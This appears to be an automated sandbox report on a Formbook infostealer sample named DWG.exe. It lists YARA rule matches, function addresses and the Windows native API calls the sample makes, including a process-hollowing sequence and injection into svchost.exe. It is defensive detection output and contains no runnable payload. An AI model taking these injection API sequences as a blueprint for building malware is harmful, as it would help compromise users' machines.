          Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00457B080_2_00457B08
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004240750_2_00424075
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004230060_2_00423006
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004232040_2_00423204
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004253260_2_00425326
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004234B80_2_004234B8
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004435300_2_00443530
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004457180_2_00445718
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004238CF0_2_004238CF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004398910_2_00439891
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004249F10_2_004249F1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00423A870_2_00423A87
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00423C500_2_00423C50
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0043ED670_2_0043ED67
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00425D9C0_2_00425D9C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00421E340_2_00421E34
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00426F680_2_00426F68
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00427F390_2_00427F39
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041C9C95_2_0041C9C9
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041C98E5_2_0041C98E
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041BA575_2_0041BA57
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004012085_2_00401208
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00408C805_2_00408C80
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041CFA35_2_0041CFA3
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA20A05_2_00AA20A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B420A85_2_00B420A8
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8B0905_2_00A8B090
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B428EC5_2_00B428EC
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4E8245_2_00B4E824
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A8305_2_00A9A830
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B310025_2_00B31002
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A999BF5_2_00A999BF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A941205_2_00A94120
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A7F9005_2_00A7F900
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B422AE5_2_00B422AE
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B34AEF5_2_00B34AEF
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B2FA2B5_2_00B2FA2B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAEBB05_2_00AAEBB0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B223E35_2_00B223E3
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3DBD25_2_00B3DBD2
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B303DA5_2_00B303DA
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AAABD85_2_00AAABD8
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B42B285_2_00B42B28
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9A3095_2_00A9A309
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A9AB405_2_00A9AB40
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8841F5_2_00A8841F
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3D4665_2_00B3D466
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AA25815_2_00AA2581
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A8D5E05_2_00A8D5E0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B425DD5_2_00B425DD
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A70D205_2_00A70D20
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B42D075_2_00B42D07
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B41D555_2_00B41D55
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B42EF75_2_00B42EF7
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00A96E305_2_00A96E30
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B3D6165_2_00B3D616
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B41FF15_2_00B41FF1
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00B4DFCE5_2_00B4DFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037CCB4F10_2_037CCB4F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374AB4010_2_0374AB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F2B2810_2_037F2B28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A30910_2_0374A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037D23E310_2_037D23E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E03DA10_2_037E03DA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037EDBD210_2_037EDBD2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375ABD810_2_0375ABD8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375EBB010_2_0375EBB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375138B10_2_0375138B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B23610_2_0374B236
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037DFA2B10_2_037DFA2B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E4AEF10_2_037E4AEF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F22AE10_2_037F22AE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374412010_2_03744120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0372F90010_2_0372F900
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037499BF10_2_037499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374A83010_2_0374A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037FE82410_2_037FE824
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E100210_2_037E1002
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F28EC10_2_037F28EC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037520A010_2_037520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F20A810_2_037F20A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0373B09010_2_0373B090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F1FF110_2_037F1FF1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037FDFCE10_2_037FDFCE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03746E3010_2_03746E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037ED61610_2_037ED616
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F2EF710_2_037F2EF7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F1D5510_2_037F1D55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03720D2010_2_03720D20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F2D0710_2_037F2D07
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0373D5E010_2_0373D5E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037F25DD10_2_037F25DD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0375258110_2_03752581
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E2D8210_2_037E2D82
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0374B47710_2_0374B477
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037ED46610_2_037ED466
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0373841F10_2_0373841F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037E449610_2_037E4496
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2C9C910_2_02F2C9C9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2C98E10_2_02F2C98E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F12FB010_2_02F12FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F2CFA310_2_02F2CFA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F18C8010_2_02F18C80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_02F12D9010_2_02F12D90
          Source: C:\Users\user\Desktop\DWG.exeCode function: String function: 0043691C appears 124 times
          Source: C:\Users\user\Desktop\DWG.exeCode function: String function: 00A7B150 appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B150 appears 136 times
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00457368 NtAllocateVirtualMemory,0_2_00457368
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0045B4DD NtTerminateProcess,0_2_0045B4DD
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004574D8 NtCreateFile,0_2_004574D8
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0045D728 NtCreateFile,NtCreateSection,NtMapViewOfSection,0_2_0045D728
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0045D928 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,0_2_0045D928
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_004579E8 NtCreateFile,NtCreateSection,NtMapViewOfSection,NtClose,0_2_004579E8
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00458A28 NtWriteFile,NtCreateSection,NtClose,0_2_00458A28
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00457B08 CreateProcessInternalW,NtQueryInformationProcess,NtUnmapViewOfSection,NtMapViewOfSection,NtGetContextThread,NtSetContextThread,NtWriteVirtualMemory,NtResumeThread,NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,0_2_00457B08
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00458097 NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,0_2_00458097
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_0045838A NtClose,NtFreeVirtualMemory,NtUnmapViewOfSection,0_2_0045838A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004185E0 NtCreateFile,5_2_004185E0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00418690 NtReadFile,5_2_00418690
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00418710 NtClose,5_2_00418710
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004187C0 NtAllocateVirtualMemory,5_2_004187C0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041883A NtAllocateVirtualMemory,5_2_0041883A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_004185DA NtCreateFile,5_2_004185DA
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00418632 NtCreateFile,5_2_00418632
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041868C NtReadFile,5_2_0041868C
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_0041870B NtClose,5_2_0041870B
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB98F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00AB98F0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9860 NtQuerySystemInformation,LdrInitializeThunk,5_2_00AB9860
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9840 NtDelayExecution,LdrInitializeThunk,5_2_00AB9840
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB99A0 NtCreateSection,LdrInitializeThunk,5_2_00AB99A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00AB9910
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9A20 NtResumeThread,LdrInitializeThunk,5_2_00AB9A20
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00AB9A00
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9A50 NtCreateFile,LdrInitializeThunk,5_2_00AB9A50
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB95D0 NtClose,LdrInitializeThunk,5_2_00AB95D0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9540 NtReadFile,LdrInitializeThunk,5_2_00AB9540
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB96E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00AB96E0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00AB9660
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB97A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00AB97A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9780 NtMapViewOfSection,LdrInitializeThunk,5_2_00AB9780
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9FE0 NtCreateMutant,LdrInitializeThunk,5_2_00AB9FE0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9710 NtQueryInformationToken,LdrInitializeThunk,5_2_00AB9710
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB98A0 NtWriteVirtualMemory,5_2_00AB98A0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9820 NtEnumerateKey,5_2_00AB9820
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00ABB040 NtSuspendThread,5_2_00ABB040
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB99D0 NtCreateProcessEx,5_2_00AB99D0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9950 NtQueueApcThread,5_2_00AB9950
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9A80 NtOpenDirectoryObject,5_2_00AB9A80
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9A10 NtQuerySection,5_2_00AB9A10
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00ABA3B0 NtGetContextThread,5_2_00ABA3B0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9B00 NtSetValueKey,5_2_00AB9B00
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB95F0 NtQueryInformationFile,5_2_00AB95F0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9520 NtWaitForSingleObject,5_2_00AB9520
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00ABAD30 NtSetContextThread,5_2_00ABAD30
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9560 NtWriteFile,5_2_00AB9560
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB96D0 NtCreateKey,5_2_00AB96D0
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9610 NtEnumerateValueKey,5_2_00AB9610
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9670 NtQueryInformationProcess,5_2_00AB9670
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9650 NtQueryValueKey,5_2_00AB9650
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9730 NtQueryVirtualMemory,5_2_00AB9730
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00ABA710 NtOpenProcessToken,5_2_00ABA710
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9760 NtOpenProcess,5_2_00AB9760
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00AB9770 NtSetInformationFile,5_2_00AB9770
          Source: C:\Users\user\Desktop\DWG.exeCode function: 5_2_00ABA770 NtOpenThread,5_2_00ABA770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769A50 NtCreateFile,LdrInitializeThunk,10_2_03769A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_03769910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037699A0 NtCreateSection,LdrInitializeThunk,10_2_037699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769860 NtQuerySystemInformation,LdrInitializeThunk,10_2_03769860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769840 NtDelayExecution,LdrInitializeThunk,10_2_03769840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769710 NtQueryInformationToken,LdrInitializeThunk,10_2_03769710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769FE0 NtCreateMutant,LdrInitializeThunk,10_2_03769FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769780 NtMapViewOfSection,LdrInitializeThunk,10_2_03769780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03769660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769650 NtQueryValueKey,LdrInitializeThunk,10_2_03769650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037696E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_037696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037696D0 NtCreateKey,LdrInitializeThunk,10_2_037696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769540 NtReadFile,LdrInitializeThunk,10_2_03769540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_037695D0 NtClose,LdrInitializeThunk,10_2_037695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769B00 NtSetValueKey,10_2_03769B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_0376A3B0 NtGetContextThread,10_2_0376A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769A20 NtResumeThread,10_2_03769A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03769A10 NtQuerySection,10_2_03769A10
